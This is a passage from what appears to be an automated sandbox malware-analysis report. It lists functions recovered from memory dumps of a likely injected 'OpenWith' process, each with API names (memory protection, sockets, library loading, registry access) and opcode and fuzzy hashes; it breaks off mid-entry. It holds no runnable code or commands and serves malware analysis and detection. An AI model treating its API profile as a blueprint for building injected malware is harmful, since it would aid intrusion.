                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-3916222277
                        • Opcode ID: e7e536793b46bbdf8757706278a080a854535d6fca16d5cb7745ca510e895c5d
                        • Instruction ID: 5e3fa8ab90df762fc48edf9502c7ba12e29f045fe2ac845fe061a1594b20e33c
                        • Opcode Fuzzy Hash: e7e536793b46bbdf8757706278a080a854535d6fca16d5cb7745ca510e895c5d
                        • Instruction Fuzzy Hash: B1110631708C9A4BE715AB19D8A46B677E1EF90320F64426AE45FC31D2CB1CE853C791
                        Function 00007DF41F0339D4 Relevance: 4.6, APIs: 3, Instructions: 126COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: _malloc_dbg$??3@
                        • String ID:
                        • API String ID: 2216462316-0
                        • Opcode ID: c7d75cb5367958d73e9615a6bc6f349406efcf48a859619531f8c598722d50c9
                        • Instruction ID: 811d3c66ac917a79008bbb112c9cb006b422dd37f0610ad5eb36ab233d44540c
                        • Opcode Fuzzy Hash: c7d75cb5367958d73e9615a6bc6f349406efcf48a859619531f8c598722d50c9
                        • Instruction Fuzzy Hash: C831C430608E895FE758EB25D9899B6F7F4FF54321720822AD41BC2691EF64F84287D1
                        Function 00007DF41F0810C8 Relevance: 4.6, APIs: 3, Instructions: 117COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: Completion$CreateFileModesNotificationPortioctlsocket
                        • String ID:
                        • API String ID: 1455841399-0
                        • Opcode ID: ea0de95ab8d492ab321edf1cf0b460d03c03f83aa0a5be87d8e0918c001e10b9
                        • Instruction ID: 4d73d68f82361712c6682d48a1941c9760d09e4a2c63fc61fd3c92ced17ebf23
                        • Opcode Fuzzy Hash: ea0de95ab8d492ab321edf1cf0b460d03c03f83aa0a5be87d8e0918c001e10b9
                        • Instruction Fuzzy Hash: 5E31C930F48DD44BFFA49A18988523A3EE5EF45764FF0007AE80FC2192DA29DC4286A1
                        Function 00007DF41F033564 Relevance: 3.2, APIs: 2, Instructions: 242COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: _malloc_dbg$??3@
                        • String ID:
                        • API String ID: 2216462316-0
                        • Opcode ID: ac8e64687a13b889e1874be42d2c3ca0f1a614677750a284a612a131824c467f
                        • Instruction ID: 5856016f547ee4135d35717135395199d28119af7ee085dba5af3e361f1bc035
                        • Opcode Fuzzy Hash: ac8e64687a13b889e1874be42d2c3ca0f1a614677750a284a612a131824c467f
                        • Instruction Fuzzy Hash: 2171A631A1CDC84EE739A61898D56EB7BE1FF95310F60456FE08FC2183DD38A9468691
                        Function 00007DF41F044DFC Relevance: 3.1, APIs: 2, Instructions: 92memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: Virtual$AllocProtect
                        • String ID:
                        • API String ID: 2447062925-0
                        • Opcode ID: d1d5d62458b525b217cd191320538f3c548a21db8f8a8dd998a7d78b892a2355
                        • Instruction ID: 6dbf2213c35a4e9ad051ee9509a96ba833070e1ffbf7048c2287593e9699aa89
                        • Opcode Fuzzy Hash: d1d5d62458b525b217cd191320538f3c548a21db8f8a8dd998a7d78b892a2355
                        • Instruction Fuzzy Hash: C0219031618E884BDB59EB18D881BE6B7E1FF98310F10452AE54FC3682DE38E9468781
                        Function 00007DF41F04B064 Relevance: 3.0, APIs: 2, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: Path$??3@AcceptConnectNameName_Port_calloc_dbg_malloc_dbg
                        • String ID:
                        • API String ID: 3068672202-0
                        • Opcode ID: 7e0ab1111397d507d7881f8866247adeba30b7f5dcd171a7b7908f5c06eb3e7a
                        • Instruction ID: 9f24ae51140fdbe018e3b1b6710d44704d576b7eda42bfa972134a84d9da45ce
                        • Opcode Fuzzy Hash: 7e0ab1111397d507d7881f8866247adeba30b7f5dcd171a7b7908f5c06eb3e7a
                        • Instruction Fuzzy Hash: 2BF02831218D0C4FE788EB2D9C8C5B63BE5EBD8321754427AE00BC3260DE68D8458390
                        Function 00007DF41F10F908 Relevance: 2.0, APIs: 1, Instructions: 535COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: _calloc_dbg
                        • String ID:
                        • API String ID: 1170608187-0
                        • Opcode ID: 1d5740f58046608e0ce2bb673f58d59c5f69c32263900ee074ffb9a2406d7457
                        • Instruction ID: e89a505c47db8db632212848491f629ac7c82c98ffd4e54cb9cfdbb476352876
                        • Opcode Fuzzy Hash: 1d5740f58046608e0ce2bb673f58d59c5f69c32263900ee074ffb9a2406d7457
                        • Instruction Fuzzy Hash: F0121D3150CED88AFBA4EB288885BA673E1FF94310F64057AD84EC7186DB34ED468791
                        Function 00007DF41F0821BC Relevance: 1.8, APIs: 1, Instructions: 281networkCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: Recv
                        • String ID:
                        • API String ID: 4192927123-0
                        • Opcode ID: c4c57ca064fec79989649ddb6862af836f57c300bd75a5ec3f98270fb5e76cde
                        • Instruction ID: feebcf6b1ffc6ea71c31e37d64623b4a7391e4774b02cc49445642f667c89c1d
                        • Opcode Fuzzy Hash: c4c57ca064fec79989649ddb6862af836f57c300bd75a5ec3f98270fb5e76cde
                        • Instruction Fuzzy Hash: 3DA1D130E48EC58FEB98DB1884846A6BBF0FF55334FA0116AD49FC25D1D738E85287A1
                        Function 00007DF41F052E34 Relevance: 1.7, APIs: 1, Instructions: 245registryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: Open
                        • String ID:
                        • API String ID: 71445658-0
                        • Opcode ID: d8340601590ed8b71669f7c6d40f22125e0dc7ab3cfec3bbe45ed9527f2fef5b
                        • Instruction ID: 3e630703ae3cb99baa58d8b8207e86a9f099162f6c808241481077fd879b222a
                        • Opcode Fuzzy Hash: d8340601590ed8b71669f7c6d40f22125e0dc7ab3cfec3bbe45ed9527f2fef5b
                        • Instruction Fuzzy Hash: FC91CE3150CB888FE764EF24C899B9BB7E1FF99311F10492EA48AC3261DB74E545CB52
                        Function 00007DF41F081F58 Relevance: 1.7, APIs: 1, Instructions: 227networkCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: Send
                        • String ID:
                        • API String ID: 121738739-0
                        • Opcode ID: e6bbb75cfcada6243a44a272e57bf7ceaccf3902ad7b4c735c76777bdf036997
                        • Instruction ID: d15428c78d68d92fb5821326e97a2c17382aeaead967593aed8d68c298ce29b5
                        • Opcode Fuzzy Hash: e6bbb75cfcada6243a44a272e57bf7ceaccf3902ad7b4c735c76777bdf036997
                        • Instruction Fuzzy Hash: 59816070908E898FEB98DF28C484766BBE0FF64324F60426AD84FC7691D735E855CB91
                        Function 00007DF41F0441D8 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: InformationVolume
                        • String ID:
                        • API String ID: 2039140958-0
                        • Opcode ID: 7301991a55ae90a18fd8a2167234c9b178d7ebdeea410f897018aea7b1691faa
                        • Instruction ID: 48470a3427cd46a136da546e557090785387f078fcfe253f4a6c2333240502cc
                        • Opcode Fuzzy Hash: 7301991a55ae90a18fd8a2167234c9b178d7ebdeea410f897018aea7b1691faa
                        • Instruction Fuzzy Hash: 66615C7190CB888BD765EF24D8956EBBBE1FF98310F504A2EE48FC2191DE34A545CB42
                        Function 00007DF41F05131C Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: _malloc_dbg
                        • String ID:
                        • API String ID: 1527718024-0
                        • Opcode ID: de4e33abc2b85d707b14ce31c2985da81c8d9c2e164d1120f04ddc1fc4c9d720
                        • Instruction ID: a951d104aaba26c1db510986050533216b44330be6635ef820cee48107ce483e
                        • Opcode Fuzzy Hash: de4e33abc2b85d707b14ce31c2985da81c8d9c2e164d1120f04ddc1fc4c9d720
                        • Instruction Fuzzy Hash: C8417E30608E4E8FDB94EF2CD888AA577E1FF68311720467BD40AC7665DB74E8818BC0
                        Function 00007DF41F04B2B8 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort_malloc_dbg
                        • String ID:
                        • API String ID: 2831898825-0
                        • Opcode ID: 4ecf2b624d510c0b9105c9875737021730bb05f6acc8958d51b1f99a9df8c032
                        • Instruction ID: 1ccd450b8b8f093ae72dc8d71d16ec3dc8ad29576723d109a646af2d1bfea7aa
                        • Opcode Fuzzy Hash: 4ecf2b624d510c0b9105c9875737021730bb05f6acc8958d51b1f99a9df8c032
                        • Instruction Fuzzy Hash: 0D418370508F888FEB58EF19D4856A6BBE0FF58311F10456EE84EC7292DB74E885CB52
                        Function 00007DF41F033410 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: _malloc_dbg
                        • String ID:
                        • API String ID: 1527718024-0
                        • Opcode ID: cc4326c6841866a6755c31003428b424b06f8f10db791a6fd7561e0a70c8a8fc
                        • Instruction ID: 090379dc8e5382655f29b6cdb5b5e43a61a9b0f38443e877a9ac7df99a9bd429
                        • Opcode Fuzzy Hash: cc4326c6841866a6755c31003428b424b06f8f10db791a6fd7561e0a70c8a8fc
                        • Instruction Fuzzy Hash: 3541DA30A088D94FEB5DDE2989D507B3BF1EF4431572441BBD85BCA247D928E947C7A0
                        Function 00007DF41F108698 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: _calloc_dbg
                        • String ID:
                        • API String ID: 1170608187-0
                        • Opcode ID: 0f09175ed41ec52fb61368549939e2fec1b0430f8f61d3b36df7633389686728
                        • Instruction ID: 51ade04ed474ea84d33b61c1aab650a633b43fe36f1d77dcd31fc2488d08d2b3
                        • Opcode Fuzzy Hash: 0f09175ed41ec52fb61368549939e2fec1b0430f8f61d3b36df7633389686728
                        • Instruction Fuzzy Hash: 2C41D670908A1C8FEB91DF1894887D176E1FB68711F2842BBDC4DCF25ADB748885CBA0
                        Function 00007DF41F042110 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ErrorFunctionModeTable
                        • String ID:
                        • API String ID: 928017140-0
                        • Opcode ID: 3093e2713d4c83f778b6f58d544e1c428f7102d517b3c9af48ca3ee171aa4d06
                        • Instruction ID: b220ec932e7aed2398c09462f8a39a1c2d26aec4ac423bbc41dfa9a24da6485b
                        • Opcode Fuzzy Hash: 3093e2713d4c83f778b6f58d544e1c428f7102d517b3c9af48ca3ee171aa4d06
                        • Instruction Fuzzy Hash: D0315221B18DC84FEB54BB58D88296A77E1EF58320B60057FE50FC31D3D918AD87C6A2
                        Function 00007DF41F082700 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: setsockopt
                        • String ID:
                        • API String ID: 3981526788-0
                        • Opcode ID: 405079254f4dbac4a13797b27ee38af6170be3b6057a9a13f7f6cbe7f380fdd3
                        • Instruction ID: 50afd82c09ce4d328bef9edadbcda267e02737d23920b73a49a67adb39579433
                        • Opcode Fuzzy Hash: 405079254f4dbac4a13797b27ee38af6170be3b6057a9a13f7f6cbe7f380fdd3
                        • Instruction Fuzzy Hash: A4313070948A858FEB98DF18C4887517BE1FF55325FA042BAD81ECB2E6D734D882CB50
                        Function 0000025B14E2185C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B14E20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_25b14e20000_OpenWith.jbxd
                        Similarity
                        • API ID: MitigationPolicyProcess
                        • String ID:
                        • API String ID: 1088084561-0
                        • Opcode ID: 04359cd7b97b11c476e8c0617afcaa098c35e265ec660168a6fbd24c0647ca60
                        • Instruction ID: 74408ff643bda030f845d27a8ac1cefd7ce95fe1a7e167f2f3d083df6fff2841
                        • Opcode Fuzzy Hash: 04359cd7b97b11c476e8c0617afcaa098c35e265ec660168a6fbd24c0647ca60
                        • Instruction Fuzzy Hash: B531E936100E664AF7AE97648CA8FE1F3D1EB983A2F1C81B98409C61D5DF71C941C74C
                        Function 00007DF41F106A50 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                        Download Yara Rule
                        APIs
                        • ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,-00000002,00007DF41F05382D,?,?,?,?,?,?,-00000002,00007DF41F0538CF), ref: 00007DF41F106AB9
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ??3@
                        • String ID:
                        • API String ID: 613200358-0
                        • Opcode ID: 5204cd006ebb97b128dedf16bba74c8e00bea10f2ebc18799332b24ab1af1d5a
                        • Instruction ID: ddaf8ce6fd77d64603e4f7bf6e8d76262785ba96edc4b09d3dcf42c94799423b
                        • Opcode Fuzzy Hash: 5204cd006ebb97b128dedf16bba74c8e00bea10f2ebc18799332b24ab1af1d5a
                        • Instruction Fuzzy Hash: 5031EE74615C998FFF98FB18C4A5B6933A1FF98311F6444799C0BCA696CF28AC42C720
                        Function 0000025B16825394 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000003.2278231695.0000025B16820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B16820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_3_25b16820000_OpenWith.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 8f0f157fb83daee5cb6c9520c57f82bef06885daf9e14b2ffd789235ee1ccf1c
                        • Instruction ID: 8b15833642fedb5d8a39cbcdfea50d2485024e470bf5fac207edde41a41b33ea
                        • Opcode Fuzzy Hash: 8f0f157fb83daee5cb6c9520c57f82bef06885daf9e14b2ffd789235ee1ccf1c
                        • Instruction Fuzzy Hash: D5017C70610E055BE7A99F38C8AC776B3E1FB58312F04462AE81AC36C1DB74E891C795
                        Function 00007DF41F04A124 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        • ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,?,-00000001,00007DF41F04B707), ref: 00007DF41F04A16B
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ??3@
                        • String ID:
                        • API String ID: 613200358-0
                        • Opcode ID: 615d3ef31dc39e001ccb32ef45f5c84ddeb3600274fc1f206aae9d940679b753
                        • Instruction ID: 83d58d943587f0254ba85633951ccdf7ba18a64698554a000b18c3bcc7866ee7
                        • Opcode Fuzzy Hash: 615d3ef31dc39e001ccb32ef45f5c84ddeb3600274fc1f206aae9d940679b753
                        • Instruction Fuzzy Hash: E201F630708C5C8FDF88EF1CC4C4E5573E5EBA9324B6805AAD44ECB256CA25EC82CB50
                        Function 00007DF41F035330 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                        Download Yara Rule
                        APIs
                        • _malloc_dbg.MSVCRT(?,?,?,?,-00000001,?,-00000001,00007DF41F0353BE), ref: 00007DF41F035375
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: _malloc_dbg
                        • String ID:
                        • API String ID: 1527718024-0
                        • Opcode ID: 051b47b6163c57a56397831363f2f208832c5eccc5cbea97d62df897e1ee0233
                        • Instruction ID: d8fb88500987e05f28b489a99a44301453b944e8a312df139a2abdcaa821334f
                        • Opcode Fuzzy Hash: 051b47b6163c57a56397831363f2f208832c5eccc5cbea97d62df897e1ee0233
                        • Instruction Fuzzy Hash: D401D131B14E465FE7689B29D588332B6E1FF98321F18463AE809C3290DB79E885C7D0
                        Function 00007DF41F08D6EC Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ??3@
                        • String ID:
                        • API String ID: 613200358-0
                        • Opcode ID: 477c6fbf3943f877d88929c3287f51d47fe487078bb79bd2b27da6bea03aeec5
                        • Instruction ID: 2987772f8f9ad462e294ddc40aa0dc9e38eebdc1878fed4ecb1fe3e14af46974
                        • Opcode Fuzzy Hash: 477c6fbf3943f877d88929c3287f51d47fe487078bb79bd2b27da6bea03aeec5
                        • Instruction Fuzzy Hash: 25F03130B5BD4A8BFF6C6B65A86822937B1EF24312B54113FD807C21A0CF2C98419722
                        Function 0000025B14E219A0 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B14E20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_25b14e20000_OpenWith.jbxd
                        Similarity
                        • API ID: ExceptionHandlerRemoveVectored
                        • String ID:
                        • API String ID: 1340492425-0
                        • Opcode ID: 68a2bebb63dec11ebeb4fbf40c1c95563ebbd08489d40e2effbc7ec76ba53b27
                        • Instruction ID: 7c3a3ca1cede5296c87055493a4551a7ba28256d0664709c46ff7eada8730bdb
                        • Opcode Fuzzy Hash: 68a2bebb63dec11ebeb4fbf40c1c95563ebbd08489d40e2effbc7ec76ba53b27
                        • Instruction Fuzzy Hash: BCF03A31214E098FDF9DEF95C8D9FA133A4EB28301F0441BACC0ECB15ADA21E985C795
                        Function 00007DF41F032124 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: CreateHeap
                        • String ID:
                        • API String ID: 10892065-0
                        • Opcode ID: 7a3e711983133c84745abeac61ff9bae0bae1902e442caba6f883a349e05e13e
                        • Instruction ID: f5c08308272003074e7b4fa3dc01188f512a2dfe88017a1434f2023ea3f3a30f
                        • Opcode Fuzzy Hash: 7a3e711983133c84745abeac61ff9bae0bae1902e442caba6f883a349e05e13e
                        • Instruction Fuzzy Hash: 59F0E521F0CDC88FE720AF7A6E8112B2AA1DF94331F74453BD60BC2181D8399983D220
                        Function 00007DF41F041E78 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AddressCallerProc
                        • String ID:
                        • API String ID: 2663294120-0
                        • Opcode ID: 1f4acfd73e0f869c342452aadbb05759e16190e48826278917dcf2679bb9de65
                        • Instruction ID: 853122a8533bb3ab109e98ce98c026354573ef173a60d91f530578ace83293d0
                        • Opcode Fuzzy Hash: 1f4acfd73e0f869c342452aadbb05759e16190e48826278917dcf2679bb9de65
                        • Instruction Fuzzy Hash: D6E0C211B08C490B6B6861AE24CCA7716D6DFDC172714027BE41EC3296EC14CC424390
                        Function 00007DF41F053474 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: setsockopt
                        • String ID:
                        • API String ID: 3981526788-0
                        • Opcode ID: 93a4616800550b85056b3bfca5b27a1e2e5fff5011940eb12dbaf61b78639e47
                        • Instruction ID: b5d8f38d7b3fbfbc3fb4bc56d2185f636da6670b3f18e95ea2502f898bf250e3
                        • Opcode Fuzzy Hash: 93a4616800550b85056b3bfca5b27a1e2e5fff5011940eb12dbaf61b78639e47
                        • Instruction Fuzzy Hash: 90F082741149044BEB48DF5CC48876577E2FFA9315F100169E90DC72E4D7359949C751
                        Function 00007DF41F113310 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                        Download Yara Rule
                        APIs
                        • ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,00000008,00007DF41F10E721,?,?,?,?,?,?,?,00007DF41F1069C1), ref: 00007DF41F113337
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ??3@
                        • String ID:
                        • API String ID: 613200358-0
                        • Opcode ID: 4174e90241353f795823af0608cb9a87f3894efd3ba12091aa885cd2d184db3b
                        • Instruction ID: 2d2ed8d5ad6ceda0d054f57a4609d433ab87059eddca5a4b9582a2cf7f3bfda3
                        • Opcode Fuzzy Hash: 4174e90241353f795823af0608cb9a87f3894efd3ba12091aa885cd2d184db3b
                        • Instruction Fuzzy Hash: D9F03970125E894BFF98DF58C098B6276A1FF58301F644099981ACA68AC778D891C790
                        Function 00007DF41F032BD4 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: FunctionTable
                        • String ID:
                        • API String ID: 1252446317-0
                        • Opcode ID: c25ee31d986a096af27cae4d435ad27a8a6e049fd93e6a2be314aec3626596b8
                        • Instruction ID: e53a5deeb4f65e3efa44132e253073e8a9bb8d5269651acd776dcd8d1bcbe4ee
                        • Opcode Fuzzy Hash: c25ee31d986a096af27cae4d435ad27a8a6e049fd93e6a2be314aec3626596b8
                        • Instruction Fuzzy Hash: C0E04F305149498FEB9CD61DC9097503AE0EB5831AFA08269D405C9291CB39D49BCF41
                        Function 00007DF41F041E4C Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                        • Instruction ID: 35b8f0b4532ccc00635cb6800c660c8b4b451d14097fb5ae5a394f8996bff632
                        • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                        • Instruction Fuzzy Hash: 60D0A720724D4D1FEA48737E5CD532625D6EFCC231F60113BF80EC2282D958CC564351
                        Function 00007DF41F0514C4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ??3@
                        • String ID:
                        • API String ID: 613200358-0
                        • Opcode ID: c90adcd0eea0c5e08c1d8f092ee7ab60bc92da0a83167810985a0d7785137009
                        • Instruction ID: 0fe5676deacda80597714522c9e80107d3f41a75ad7e0478bfeb94946abc52d8
